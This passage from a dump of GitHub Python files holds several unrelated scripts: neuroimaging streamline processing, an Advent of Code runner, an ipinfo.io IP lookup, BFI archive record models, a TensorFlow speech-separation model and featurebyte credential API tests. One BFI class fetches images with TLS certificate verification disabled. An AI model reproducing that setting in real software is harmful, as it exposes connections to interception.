indent=4)","repo_name":"yaoxiaosui/Music-Lover","sub_path":"FinalProject/video_api.py","file_name":"video_api.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20025109931","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport matplotlib as mpl\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport dipy.tracking.utils as dtu\nimport pandas as pd\nimport nibabel as nib\n#get_ipython().magic(u'matplotlib inline')\nimport sys\n\n\n# In[3]:\nregion = sys.argv[1]\n\nDATA_PATH = \"/Users/aarya/Atlas/tracks/\"+str(region)\n\nimport os\nimport os.path as op\nfrom glob import glob\n\n\n# In[19]:\n\nlabels = [f for f in os.listdir(DATA_PATH) if not f.startswith('.')]\n#len(labels)\n\n\n# In[5]:\n\nbundle_fnames = glob(op.join(DATA_PATH, '*.trk'))\n#bundle_fnames[0]\n\n\n# In[7]:\n\nt1_shape = (256, 256, 150)\n\n\n# In[8]:\nsl_sum = 0\nsls = []\nprint('Bundles and number of streamlines: \\n')\nfor b_idx, bundle in enumerate(bundle_fnames):\n tgram = nib.streamlines.load(op.join(DATA_PATH, bundle))\n 
print(bundle, len(tgram.streamlines))\n sls.append(len(tgram.streamlines))\n sl_sum += len(tgram.streamlines)\n\nminsls = min(sls)\nprint('\\n\\n')\n# In[10]:\n\ndef get_bname(f):\n return f.split('/')[-1].split('.')[0]\n\n# In[14]:\n\nii = 0\nnewpath = DATA_PATH+'/slines'\nif not os.path.exists(newpath):\n os.makedirs(newpath)\nfor b_idx, bundle in enumerate(bundle_fnames):\n tgram = nib.streamlines.load(op.join(DATA_PATH, bundle))\n print(bundle, len(tgram.streamlines))\n for sl_idx, sl in enumerate(list(dtu.move_streamlines(tgram.streamlines, np.linalg.inv(tgram.affine)))):\n if sl_idx > minsls:\n break\n bname = get_bname(bundle)\n savepath = newpath+\"/\"+bname+'-'+str(sl_idx)\n if not np.mod(sl_idx, 100):\n #print(\"Streamline {0} at index {1}\".format(sl_idx, ii))\n print(\"Streamline {0} at index {1} of Bundle {2} saved at path {3}\".format(sl_idx, ii, bname, savepath))\n vol = np.zeros(t1_shape + (1,), dtype=bool)\n sl = np.round(sl).astype(int).T\n vol[sl[0], sl[1], sl[2]] = 1\n a1 = np.max(vol, 0).squeeze()\n for x in range(1,3):\n a1 = np.concatenate((a1, np.max(vol, x).squeeze()), axis=1)\n np.save(savepath, a1)\n ii += 1\n\n\n# In[15]:\n\ndef get_label(path):\n x = path.split('/')[-1].split('_')[:2]\n return '_'.join(x)\n\n\n# In[16]:\n\ndef get_dataframe(directory):\n paths = [os.path.join(directory, f) for f in os.listdir(directory) if not f.startswith('.')]\n labels = [get_label(path) for path in paths if not path.startswith('.')]\n return pd.DataFrame({'paths': paths, 'labels': labels})\nd = get_dataframe(newpath)\nd.head()\n\n\n# In[18]:\n\n\n\n\n\n","repo_name":"aarya22/Atlas","sub_path":"atlas_munging.py","file_name":"atlas_munging.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16646090510","text":"# from lights_part_1 import Lights, DIMENSIONS\nfrom lights_part_2 import Lights, DIMENSIONS\n\nlights = Lights(DIMENSIONS)\n\nwith open(\"input.txt\", \"r\") as f:\n instructions = f.readlines()\n \n for instruction in instructions:\n lights.read_instruction(instruction)\n\n # part 1\n #print(lights.get_total_lights_on())\n\n # part 2\n print(lights.get_total_brightness())\n\n \n","repo_name":"sid-707/Advent-of-Code-2015-Python","sub_path":"day-6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32241182590","text":"import requests\nimport json\n\ndef lookup_data(ip_address):\n response = requests.get(f\"https://ipinfo.io/{ip_address}/json\")\n return response.json()\n\ndef save_data(data, filename):\n with open(filename, 'w') as f:\n json.dump(data, f)\n\ndef load_data(filename):\n with open(filename, 'r') as f:\n return json.load(f)\n\ndef ip_lookup(ip_address, filename):\n data = lookup_data(ip_address)\n save_data(data, filename)\n\nif __name__ == \"__main__\":\n ip_address = input(\"Enter the IP address: \")\n filename = \"ip_data.json\"\n ip_lookup(ip_address, filename)\n data = load_data(filename)\n print(data)\n","repo_name":"geeknik/tiny-python-scripts","sub_path":"osint/ip_lookup.py","file_name":"ip_lookup.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"34863074485","text":"#!/usr/bin/env python3\n\n'''\nModule for Splitting scripts to\nretrieve carrier information inc\nsiblings, cousins, partWholes,\npackage, can data, 
segments etc.\n\nNote:\nContent class is out of use in\npost-Imagen DPI workflows\n\nRefactored for Python3\nJoanna White\nJune 2022\n'''\n\n# Public packages\nimport re\nimport os\nimport sys\nimport string\nimport logging\nimport datetime\nimport requests\nfrom PIL import Image\n\n# Private packages\nsys.path.append(os.environ['CODE'])\nimport adlib\n\n# Global variables\nLOGS = os.environ['LOG_PATH']\nLOG_PATH = os.path.join(LOGS, 'splitting_models.log')\nDPI_PATH = os.environ['DPI_API']\nCID_API = os.environ['CID_API']\nCID = adlib.Database(url=CID_API)\n\n# Setup logging, overwrite each time\nlogger = logging.getLogger('split_qnap_test')\nhdlr = logging.FileHandler(LOG_PATH)\nformatter = logging.Formatter('%(asctime)s\\t%(levelname)s\\t%(message)s')\nhdlr.setFormatter(formatter)\nlogger.addHandler(hdlr)\nlogger.setLevel(logging.INFO)\n\n\ndef star(f):\n ''' Allows arg unpacking in lambda '''\n return lambda args: f(*args)\n\n\nclass Item():\n ''' Useful interactions with an item record '''\n\n def __init__(self, priref):\n self.priref = priref\n self.object_number = self._object_number()\n self.containers = Containers(priref)\n self.reels = max(len(i) for i in self.containers.identifiers.values() if i)\n\n def _object_number(self):\n ''' Resolve id '''\n r = cid_get('items', f'priref={self.priref}', 'object_number')\n logger.info(\"Object number: %s\", r.records)\n return r.records[0]['object_number'][0]\n\n def data(self):\n ''' Fetch the complete record '''\n r = cid_get('items', f'priref={self.priref}', '')\n logger.info(\"data: %s\", r.records)\n return r.records[0]\n\n def siblings(self):\n ''' Fetch identifiers of items in same manifestation '''\n q = f'(part_of_reference->(parts_reference.lref={self.priref}))'\n r = cid_get('items', q, 'priref')\n siblings_priref = [int(i['priref'][0]) for i in r.records if i]\n logger.info(\"Siblings: %s\", siblings_priref)\n return siblings_priref\n\n def cousins(self):\n ''' Fetch identifiers of items in any other manifestation in same work '''\n q = f'(part_of_reference->(part_of_reference->(parts_reference->(parts_reference.lref={self.priref}))))'\n r = cid_get('items', q, 'priref')\n cousins_priref = [int(i['priref'][0]) for i in r.records if int(i['priref'][0]) not in self.siblings()]\n logger.info(\"Cousins: %s\", cousins_priref)\n return cousins_priref\n\n\nclass Containers():\n ''' Fetch and wrangle physical label identifiers for the given item priref '''\n\n def __init__(self, priref):\n self.packages = self._packages(priref)\n self.cans = self._cans(priref)\n self.identifiers = {'packages': self.packages, 'cans': self.cans}\n\n def _packages(self, priref):\n ''' Obtain identifiers '''\n q = f'collcopy.number->object.number.lref={priref}'\n r = cid_get('packages', q, 'package_number')\n return [str(i['package_number'][0]) for i in r.records if i]\n\n def _cans(self, priref):\n ''' Wrangle identifier '''\n q = f'priref={priref} and can_ID=*'\n r = cid_get('items', q, 'can_ID')\n logger.info(\"Cans: %s\", r.records[0]['can_ID'][0])\n if r.hits == 0:\n return []\n\n can_id = str(r.records[0]['can_ID'][0])\n\n # N-item, eg 5074964Aa becomes 5074964AA\n if (can_id[-2] == 'A' and can_id[-1].islower()):\n return [f'{can_id[:-1]}A']\n # N-reel, eg 5074964A becomes 5074964AA\n if (can_id[:-1].isnumeric() and can_id[-1].isupper()):\n whole = string.ascii_uppercase.index(can_id[-1]) + 1\n return [ f\"{can_id[:-1]}{i}{can_id[-1]}\" for i in string.ascii_uppercase[:whole] ]\n # No partWhole, all other instances returned as is\n return 
[can_id]\n\n\nclass PhysicalIdentifier():\n ''' Determine class of label - package number or can ID '''\n\n def __init__(self, identifier):\n self.label = identifier\n self._types = set()\n logger.info(self.label)\n\n # Determine if identifier is used in CID\n d = {'items': 'can_ID', 'containers': 'name'}\n for db in d:\n print(db)\n q = f'{d[db]}=\"{identifier}\"'\n r = cid_get(db, q, 'priref')\n if r.records:\n self._types.add(d[db])\n print(f'* Self_types = {self._types}')\n\n # If ID is unused, does it follow pattern?\n if not self._types:\n # Regex checks for two capital letters\n if re.match(r'^.*[A-Z]{2,3}$', identifier):\n self._types.add('can_ID')\n # Regex looks for seven characters numbers/uppercase any order\n elif re.match(r'^[A-Z0-9]{7}$', identifier):\n self._types.add('package_number')\n\n @property\n def type(self):\n i = len(self._types)\n if i == 1:\n return list(self._types)[0]\n if i > 1:\n # Forces type can_ID over package_number\n return 'can_ID'\n else:\n raise Exception('Unable to determine identifier type from CID')\n\n\nclass Carrier():\n ''' Model data for a carrier from its physical or label '''\n\n def __init__(self, **identifiers):\n self.identifiers = identifiers\n self.partwhole = self._partwhole()\n self._items = None\n\n # Resolve can_ID as package if insufficient data\n if self.partwhole is None and 'can_ID' in self.identifiers:\n packages = set()\n for r in self.items:\n try:\n carriers = r['Parts']\n except KeyError as exc:\n str_except = r['object_number'][0]\n raise Exception(f'Unable to determine partWhole from can_ID - could not use package instead because item {str_except} not linked to a package') from exc\n\n for c in carriers:\n p = c['parts_reference'][0]['current_location.name'][0]['name'][0]\n packages.add(str(p))\n\n if len(packages) == 1:\n self.identifiers['name'] = list(packages)[0]\n self.partwhole = self._partwhole()\n\n self._validate()\n\n def _validate(self):\n ''' Check the data and the model '''\n\n if not self.items:\n raise Exception('Carrier has no documented items')\n if len(self.items) > 1 and self.partwhole[1] > 1:\n raise Exception('Multi-item carrier should not have multiple reels')\n\n def _partwhole(self):\n ''' Determine partwhole from identifier '''\n\n if 'name' in self.identifiers and 'can_ID' in self.identifiers:\n print('* Both Can_ID and Package detected as identifier type...')\n raise Exception('* Both Can_ID and Package detected as identifier type...')\n if 'name' in self.identifiers:\n print('* This is a Container, according to the model, querying CID for part/whole...')\n q_str = self.identifiers['name']\n q = f'current_location.name=\"{q_str}\"'\n r = cid_get('carriersfull', q, 'carrier_part.number,carrier_part.total_numbers')\n if len(r.records) > 1:\n total_recs = len(r.records)\n wholes_all = []\n for num in range(0, total_recs):\n data = r.records[num]\n print(f'* Querying CID for multiple part returns / whole data: {q}')\n try:\n part = int(data['carrier_part.number'][0])\n whole = int(data['carrier_part.total_numbers'][0])\n wholes_all.append(whole)\n print(f'* Part {part} of {whole}')\n except Exception as exc:\n print('* Insufficient reel data in package record')\n raise Exception('* Insufficient reel data in package record') from exc\n if wholes_all.count(wholes_all[0]) != len(wholes_all):\n raise Exception(f'* Whole numbers do not match for all returned partWholes: {wholes_all}')\n\n data = r.records[0]\n print(f'* Querying CID for part / whole data: {q}')\n\n try:\n part = 
int(data['carrier_part.number'][0])\n whole = int(data['carrier_part.total_numbers'][0])\n print(f'* Part {part} of {whole}')\n except Exception as exc:\n print('* Insufficient reel data in package record')\n raise Exception('* Insufficient reel data in package record') from exc\n return [part, whole]\n\n elif 'can_ID' in self.identifiers:\n print('* This is a Can ID, according to the model, converting can_ID letters to numerical value...')\n print(self.identifiers['can_ID'])\n if re.match(r'.*[A-Z][A-Z]$', self.identifiers['can_ID']):\n # Reads can_ID final two letters, returns numerical value, eg AB = ['1','2']\n return [ string.ascii_uppercase.index(i) + 1 for i in [s for s in self.identifiers['can_ID'][-2:]] ]\n\n def _find_items(self):\n ''' Make query string required to find items '''\n if 'name' in self.identifiers:\n return f\"(parts_reference->(current_location.name={self.identifiers['name']}))\"\n\n if 'can_ID' in self.identifiers:\n if self.partwhole:\n # Multi-item tape\n if self.partwhole[-1] == 1:\n q = self.identifiers['can_ID'][:-1] + '*'\n else:\n q = self.identifiers['can_ID'][:-2] + self.identifiers['can_ID'][-1]\n else:\n q = self.identifiers['can_ID']\n\n return f'(can_ID=\"{q}\")'\n\n @property\n def items(self):\n ''' Fetch all item data '''\n if self._items is None:\n q = f'{self._find_items()} sort can_ID,priref ascending'\n r = cid_get('items', q, '')\n self._items = r.records\n\n return self._items\n\n def _field_value(self, field, value_instance=None):\n ''' Helper function for extracting field values from records '''\n values = []\n\n for r in self.items.records:\n try:\n if field in r:\n if value_instance:\n values.append(r[field][0]['value'][value_instance])\n else:\n values.append(r[field][0])\n except KeyError:\n pass\n\n return values\n\n @property\n def duration(self):\n ''' Sum all known durations of carried items'''\n try:\n total = sum(float(i) for i in self._field_value('video_duration'))\n return round(total, 2)\n except Exception as exc:\n print(exc)\n\n @property\n def video_format(self):\n ''' Return list of video formats '''\n try:\n return list(set(self._field_value('video_format', value_instance=1)))\n except IndexError:\n pass\n\n @property\n def status(self):\n ''' Return list of copy statuses '''\n try:\n return list(set(self._field_value('copy_status', value_instance=1)))\n except Exception as exc:\n print(exc)\n\n @property\n def segments(self):\n ''' Return dict of priref/segments '''\n data = self._segmentation()\n\n # Validate segmentation\n if (len(self.items) > 1 or self.partwhole[1] > 1):\n missing = [i['object_number'][0] for i in self.items if 'video_part' not in i]\n if missing:\n print(f'* Insufficient video_part data in items: {\",\".join(missing)}')\n raise Exception(f\"* Insufficient video_part data in items: {','.join(missing)}\")\n\n if (len(self.items) > 1 and self.partwhole == [1, 1]):\n print(data)\n # JMW - reworked for Py3 dictionaries, using star function\n in_sort_segments = sorted(data.items(), key=star(lambda k,v: (v[0][0], k)))\n out_sort_segments = sorted(data.items(), key=star(lambda k,v: (v[-1][-1], k)))\n print(f\"Segments:\\n{in_sort_segments}\\n{out_sort_segments}\")\n if not in_sort_segments == out_sort_segments:\n raise Exception('Illegal video_part structure')\n # Sort segments\n data = in_sort_segments\n\n if self.partwhole[1] > 1:\n try:\n # Select tape's timecode parts\n me = self.partwhole[0]\n p = int(self.items[0]['priref'][0])\n data = {p: [data[p][me-1]]}\n except Exception as exc:\n obj = 
self.items[0]['object_number'][0]\n raise Exception(f'Insufficient video_part data for reel {me} in item {obj}') from exc\n print(data)\n return data\n\n def _segmentation(self):\n ''' Wrangle segmentation information in seconds for items carried '''\n\n def seconds(time_str):\n ''' Total seconds from mm.ss string '''\n if time_str.count('.') == 1:\n m, s = [int(i) for i in time_str.split('.')]\n elif time_str.count(':') == 2:\n h, m, s = [int(i) for i in time_str.split(':')]\n m += h * 60\n else:\n m, s = [int(time_str), 0]\n return int(datetime.timedelta(minutes=m, seconds=s).total_seconds())\n\n manifest = {}\n\n for i in self.items:\n item_priref = int(i['priref'][0])\n item_obj = i['object_number'][0]\n\n if 'video_part' not in i:\n continue\n\n parts = []\n sections = []\n\n video_parts = i['video_part']\n for p in video_parts:\n if p.count('-') != 1:\n raise Exception(f'Invalid video_part format in item {item_obj}')\n\n try:\n a, b = [seconds(n) for n in p.split('-')]\n except Exception as exc:\n raise Exception(f'Illegal video_part segment in item: {item_obj}') from exc\n\n if a > b:\n raise Exception(f'Invalid video_part data in item {item_obj}')\n\n segment = (a, b)\n\n # Detect time decrements as tape divisions\n if parts:\n if a < parts[-1][-1]:\n # Multi-reeler\n if self.partwhole[1] > 1:\n sections.append(parts)\n parts = []\n else:\n # Single-reeler shouldn't have decrement in video_part sequence\n raise Exception(f'Unexpected video_part discontinuation in item {item_obj}')\n\n parts.append(segment)\n\n if parts:\n sections.append(parts)\n\n manifest[item_priref] = sections\n\n return manifest\n\n\nclass Content():\n ''' Wrappers for obtaining a/v content from priref identifiers '''\n\n def __init__(self, priref):\n self.priref = priref\n self.imagen_record = self._record()\n self.media = self._media()\n self.umids = [{i: r[i][0] for i in r if i.endswith('_umid')}\n for r in self.media]\n\n self.image_urls = [f\"{DPI_PATH}{i['imagen.media.largeimage_umid']}\" for i in self.umids]\n\n self.images = [Image.open(requests.get(i, stream=True, verify=False).raw)\n for i in self.image_urls]\n\n def _record(self):\n q = f'priref={self.priref}'\n f = 'imagen.record_identifier'\n r = cid_get('internalobject', q, f)\n id_ = str(r.records[0]['Imagen'][0][f][0])\n return id_\n\n def _media(self):\n q = f'imagen.media.identifier={self.imagen_record}'\n r = cid_get('media', q, '')\n return r.records\n\n\ndef cid_get(database, search, fields):\n ''' Simple query wrapper '''\n\n d = {'database': database,\n 'search': search,\n 'fields': fields,\n 'output': 'json',\n 'limit': '0'}\n\n try:\n result = CID.get(d)\n print(result)\n except Exception as exc:\n raise Exception from exc\n\n return result\n","repo_name":"bfidatadigipres/BFI_scripts","sub_path":"splitting_scripts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":16463,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"7883464002","text":"import tensorflow as tf\nimport numpy as np\nimport math\n\nfrom NTMCell import *\nfrom ops import _weight_variable, _bias_variable\n\nclass Model(object):\n def __init__(self, architecture, input_size, output_size, batch_size, time_step, LR, activation_function=None, \n batch_norm=True, window=1):\n # basic setting\n self.input_size = input_size\n self.output_size = output_size\n self.time_step = time_step\n self.batch_size = batch_size\n self.batch_norm = batch_norm\n self.LR = LR\n self.num_layer = len(architecture)\n 
self.architecture = architecture\n self.window = window\n self.sequence_length = [time_step]*batch_size # the list storing the time_step in each batch size\n \n # placeholder: it allow to feed in different data in each iteration\n self.x = tf.placeholder(tf.float32, [None, input_size*window], name='x')\n self.y1 = tf.placeholder(tf.float32, [None, output_size], name='y1')\n self.y2 = tf.placeholder(tf.float32, [None, output_size], name='y2')\n self.is_batch_norm_train = tf.placeholder(tf.bool)\n \n # feed forward\n with tf.variable_scope('FushionModel'):\n self.feed_forward(activation_function)\n \n # optimization\n self.compute_cost()\n self.optimizer = tf.train.AdamOptimizer(self.LR)\n \n \"\"\" not global\"\"\"\n grad_var = self.optimizer.compute_gradients(self.cost)\n def GradientClip(grad):\n if grad is None:\n return grad\n #return tf.clip_by_norm(grad, 1)\n return tf.clip_by_value(grad, -1, 1)\n clip_grad_var = [(GradientClip(grad), var) for grad, var in grad_var ]\n self.train_op = self.optimizer.apply_gradients(clip_grad_var)\n \n def feed_forward(self, activation_function=None):\n data = tf.reshape(self.x, [-1, self.input_size*self.window])\n self.Neurons = {'h0':data}\n self.States = {}\n self.init_state = {}\n for idx in range(1, self.num_layer):\n if self.architecture['l'+str(idx)]['type'] == 'fc':\n now_size = self.architecture['l'+str(idx-1)]['neurons']\n next_size = self.architecture['l'+str(idx)]['neurons']\n with tf.variable_scope('l'+str(idx)):\n W = _weight_variable([now_size, next_size])\n b = _bias_variable([next_size,])\n neurons = tf.nn.bias_add( tf.matmul(self.Neurons['h'+str(idx-1)], W), b )\n if activation_function != None:\n neurons = activation_function(neurons)\n self.Neurons.update({'h'+str(idx):neurons})\n elif self.architecture['l'+str(idx)]['type'] == 'lstm':\n now_size = self.architecture['l'+str(idx-1)]['neurons']\n next_size = self.architecture['l'+str(idx)]['neurons']\n lstm_cell = tf.nn.rnn_cell.LSTMCell(next_size, use_peepholes=False, forget_bias=1.0)\n self.init_state.update({'h'+str(idx):lstm_cell.zero_state(self.batch_size, dtype=tf.float32)})\n with tf.variable_scope('l'+str(idx)):\n neurons, final_state = tf.nn.dynamic_rnn(\n lstm_cell, tf.reshape(self.Neurons['h'+str(idx-1)], [-1, self.time_step, now_size], ), \n sequence_length=self.sequence_length, \n initial_state=self.init_state['h'+str(idx)], time_major=False)\n neurons = tf.reshape(neurons, [-1, next_size])\n self.Neurons.update({'h'+str(idx):neurons})\n self.States.update({'h'+str(idx):final_state})\n elif self.architecture['l'+str(idx)]['type'] == 'output':\n now_size = self.architecture['l'+str(idx-1)]['neurons']\n next_size = self.architecture['l'+str(idx)]['neurons']\n with tf.variable_scope('output'):\n with tf.variable_scope('sp1'):\n W1 = _weight_variable([now_size, next_size])\n b1 = _bias_variable([next_size,])\n with tf.variable_scope('sp2'): \n W2 = _weight_variable([now_size, next_size])\n b2 = _bias_variable([next_size,])\n #[:, ((self.window+1)/2-1)*self.input_size:((self.window+1)/2)*self.input_size]\n neurons1 = tf.nn.bias_add(tf.matmul(self.Neurons['h'+str(idx-1)], W1), b1)\n neurons2 = tf.nn.bias_add(tf.matmul(self.Neurons['h'+str(idx-1)], W2), b2)\n \n summ = tf.add(tf.abs(neurons1), tf.abs(neurons2)) + (1e-6)\n mask1 = tf.div(tf.abs(neurons1), summ)\n mask2 = tf.div(tf.abs(neurons2), summ)\n self.pred1 = tf.mul(\n self.Neurons['h0'][:, ((self.window+1)/2-1)*self.input_size:((self.window+1)/2)*self.input_size], mask1)\n self.pred2 = tf.mul(\n self.Neurons['h0'][:, 
((self.window+1)/2-1)*self.input_size:((self.window+1)/2)*self.input_size], mask2)\n self.Neurons.update({'h'+str(idx)+'1':self.pred1})\n self.Neurons.update({'h'+str(idx)+'2':self.pred2})\n elif (self.architecture['l'+str(idx)]['type'] == 'ntm'):\n now_size = self.architecture['l'+str(idx-1)]['neurons'] # input for ntm\n next_size = self.architecture['l'+str(idx)]['neurons'] # output for ntm\n mem_size = self.architecture['l'+str(idx)]['mem_size'] \n ntm_cell = NTMCell(now_size, next_size, mem_size=mem_size)\n self.init_state.update({'h'+str(idx):ntm_cell.zero_state(self.batch_size, dtype=tf.float32)})\n with tf.variable_scope('l'+str(idx)):\n neurons, final_state = tf.nn.dynamic_rnn(\n ntm_cell, tf.reshape(self.Neurons['h'+str(idx-1)], [-1, self.time_step, now_size], ), \n sequence_length=self.sequence_length, \n initial_state=self.init_state['h'+str(idx)], time_major=False)\n neurons = tf.reshape(neurons, [-1, next_size])\n self.Neurons.update({'h'+str(idx):neurons})\n self.States.update({'h'+str(idx):final_state})\n \n def init_state_assign(self):\n self.init_state = self.States\n \n def compute_cost(self):\n self.cost_to_show = (self.ms_error(self.Neurons['h'+str(self.num_layer-1)+'1'], self.y1) + \\\n self.ms_error(self.Neurons['h'+str(self.num_layer-1)+'2'], self.y2))/2\n self.cost = (self.ms_error(self.Neurons['h'+str(self.num_layer-1)+'1'], self.y1) + \\\n self.ms_error(self.Neurons['h'+str(self.num_layer-1)+'2'], self.y2) - \\\n 0*(self.ms_error(self.Neurons['h'+str(self.num_layer-1)+'1'], self.y2) + \\\n self.ms_error(self.Neurons['h'+str(self.num_layer-1)+'2'], self.y1)))/2\n def ms_error(self, y_pre, y_target):\n return tf.reduce_sum(tf.reduce_sum( tf.square(tf.sub(y_pre, y_target)), 1))\n ","repo_name":"KWTsou1220/mann-for-speech-separation","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":7241,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"78"} +{"seq_id":"12031777561","text":"\"\"\"\nTests for Credential route\n\"\"\"\nfrom http import HTTPStatus\nfrom unittest.mock import patch\n\nimport pytest\nfrom bson.objectid import ObjectId\n\nfrom featurebyte.models.credential import decrypt_value\nfrom tests.unit.routes.base import BaseApiTestSuite\n\n\nclass TestCredentialApi(BaseApiTestSuite):\n \"\"\"\n TestCredentialApi class\n \"\"\"\n\n class_name = \"Credential\"\n base_route = \"/credential\"\n unknown_id = ObjectId()\n payload = BaseApiTestSuite.load_payload(\"tests/fixtures/request_payloads/credential.json\")\n create_conflict_payload_expected_detail_pairs = [\n (\n payload,\n f'Credential (id: \"{payload[\"_id\"]}\") already exists. '\n f'Get the existing object by `Credential.get_by_id(id=\"{payload[\"_id\"]}\")`.',\n ),\n (\n {**payload, \"_id\": str(ObjectId())},\n f'Credential (feature_store_id: \"{payload[\"feature_store_id\"]}\") already exists. 
'\n f'Get the existing object by `Credential.get_by_id(id=\"{payload[\"_id\"]}\")`.',\n ),\n ]\n create_unprocessable_payload_expected_detail_pairs = [\n (\n {**payload, \"name\": [\"test\"]},\n [\n {\n \"loc\": [\"body\", \"name\"],\n \"msg\": \"str type expected\",\n \"type\": \"type_error.str\",\n }\n ],\n )\n ]\n\n @pytest.fixture(autouse=True)\n def patch_validate_credentials(self):\n \"\"\"\n Mock _validate_credential method\n \"\"\"\n with patch(\"featurebyte.service.credential.CredentialService._validate_credential\"):\n yield\n\n def setup_creation_route(self, api_client):\n \"\"\"\n Setup for post route\n \"\"\"\n api_object_filename_pairs = [\n (\"feature_store\", \"feature_store\"),\n ]\n for api_object, filename in api_object_filename_pairs:\n payload = self.load_payload(f\"tests/fixtures/request_payloads/{filename}.json\")\n response = api_client.post(f\"/{api_object}\", json=payload)\n assert response.status_code == HTTPStatus.CREATED\n\n # delete credential stored for feature store\n response = api_client.get(f\"{self.base_route}\")\n assert response.status_code == HTTPStatus.OK\n results = response.json()\n credential_id = results[\"data\"][0][\"_id\"]\n response = api_client.delete(f\"{self.base_route}/{credential_id}\")\n assert response.status_code == HTTPStatus.OK\n\n def multiple_success_payload_generator(self, api_client):\n \"\"\"Create multiple payload for setting up create_multiple_success_responses fixture\"\"\"\n _ = api_client\n\n for i in range(3):\n payload = self.payload.copy()\n payload[\"_id\"] = str(ObjectId())\n payload[\"name\"] = f'{self.payload[\"name\"]}_{i}'\n payload[\"feature_store_id\"] = str(ObjectId())\n yield payload\n\n def test_update_200(self, create_success_response, test_api_client_persistent):\n \"\"\"\n Test credential update (success)\n \"\"\"\n test_api_client, _ = test_api_client_persistent\n response_dict = create_success_response.json()\n credential_id = response_dict[\"_id\"]\n response = test_api_client.patch(\n f\"{self.base_route}/{credential_id}\",\n json={\n \"database_credential\": {\n \"type\": \"ACCESS_TOKEN\",\n \"access_token\": \"test2\",\n },\n \"storage_credential\": {\n \"type\": \"S3\",\n \"s3_access_key_id\": \"test1\",\n \"s3_secret_access_key\": \"test2\",\n },\n },\n )\n assert response.status_code == HTTPStatus.OK, response.json()\n result = response.json()\n\n # credentials should not exposed in response\n assert \"database_credential\" not in result\n assert \"storage_credential\" not in result\n\n # credential types will be exposed instead\n assert result[\"database_credential_type\"] == \"ACCESS_TOKEN\"\n assert result[\"storage_credential_type\"] == \"S3\"\n\n # test get audit records\n response = test_api_client.get(f\"{self.base_route}/audit/{credential_id}\")\n assert response.status_code == HTTPStatus.OK\n results = response.json()\n assert results[\"total\"] == 2\n assert [record[\"action_type\"] for record in results[\"data\"]] == [\"UPDATE\", \"INSERT\"]\n previous_values = [\n record[\"previous_values\"].get(\"database_credential\") for record in results[\"data\"]\n ]\n assert previous_values[0][\"type\"] == \"USERNAME_PASSWORD\"\n assert decrypt_value(previous_values[0][\"username\"]) == \"user\"\n assert decrypt_value(previous_values[0][\"password\"]) == \"pass\"\n assert previous_values[1] is None\n\n def test_update_404(self, test_api_client_persistent):\n \"\"\"\n Test credential update (not found)\n \"\"\"\n test_api_client, _ = test_api_client_persistent\n unknown_credential_id = 
ObjectId()\n response = test_api_client.patch(\n f\"{self.base_route}/{unknown_credential_id}\",\n json={\n \"database_credential\": {\n \"type\": \"ACCESS_TOKEN\",\n \"access_token\": \"test2\",\n },\n },\n )\n assert response.status_code == HTTPStatus.NOT_FOUND\n assert response.json() == {\n \"detail\": (\n f'Credential (id: \"{unknown_credential_id}\") not found. Please save the Credential object first.'\n )\n }\n\n def test_update_422(self, test_api_client_persistent):\n \"\"\"\n Test credential update (unprocessable credential)\n \"\"\"\n test_api_client, _ = test_api_client_persistent\n unknown_credential_id = ObjectId()\n response = test_api_client.patch(f\"{self.base_route}/{unknown_credential_id}\")\n assert response.status_code == HTTPStatus.UNPROCESSABLE_ENTITY\n assert response.json() == {\n \"detail\": [\n {\n \"loc\": [\"body\"],\n \"msg\": \"field required\",\n \"type\": \"value_error.missing\",\n }\n ]\n }\n\n response = test_api_client.patch(f\"{self.base_route}/abc\", json={\"name\": \"anything\"})\n assert response.json()[\"detail\"] == [\n {\n \"loc\": [\"path\", self.id_field_name],\n \"msg\": \"Id must be of type PydanticObjectId\",\n \"type\": \"type_error\",\n }\n ]\n\n @pytest.mark.asyncio\n async def test_get_info_200(self, test_api_client_persistent, create_success_response):\n \"\"\"Test retrieve info\"\"\"\n test_api_client, _ = test_api_client_persistent\n create_response_dict = create_success_response.json()\n doc_id = create_response_dict[\"_id\"]\n response = test_api_client.get(\n f\"{self.base_route}/{doc_id}/info\", params={\"verbose\": False}\n )\n expected_info_response = {\n \"name\": \"grocery\",\n \"updated_at\": None,\n }\n assert response.status_code == HTTPStatus.OK, response.text\n response_dict = response.json()\n assert response_dict.items() > expected_info_response.items(), response_dict\n assert \"created_at\" in response_dict\n expected_feature_store_info = {\n \"name\": \"sf_featurestore\",\n \"source\": \"snowflake\",\n \"database_details\": {\n \"account\": \"sf_account\",\n \"warehouse\": \"sf_warehouse\",\n \"database\": \"sf_database\",\n \"sf_schema\": \"sf_schema\",\n },\n }\n assert response_dict[\"feature_store_info\"].items() > expected_feature_store_info.items()\n\n verbose_response = test_api_client.get(\n f\"{self.base_route}/{doc_id}/info\", params={\"verbose\": True}\n )\n assert response.status_code == HTTPStatus.OK, response.text\n verbose_response_dict = verbose_response.json()\n assert verbose_response_dict.items() > expected_info_response.items(), verbose_response.text\n assert \"created_at\" in verbose_response_dict\n","repo_name":"featurebyte/featurebyte","sub_path":"tests/unit/routes/test_credential.py","file_name":"test_credential.py","file_ext":"py","file_size_in_byte":8262,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"78"} +{"seq_id":"26789101354","text":"# coding: utf-8\nimport os\n\n\nen_ru = {}\nif os.path.exists(\"mydict.py\"):\n import mydict\n en_ru = mydict.en_ru\n\n\ndef fill_dict(en_ru):\n new_word = None\n # side-effect: en_ru is being changed here\n while new_word != \"\":\n new_word = input(\"Введите слово \")\n new_translate = input(\"Введите перевод \")\n\n if new_word 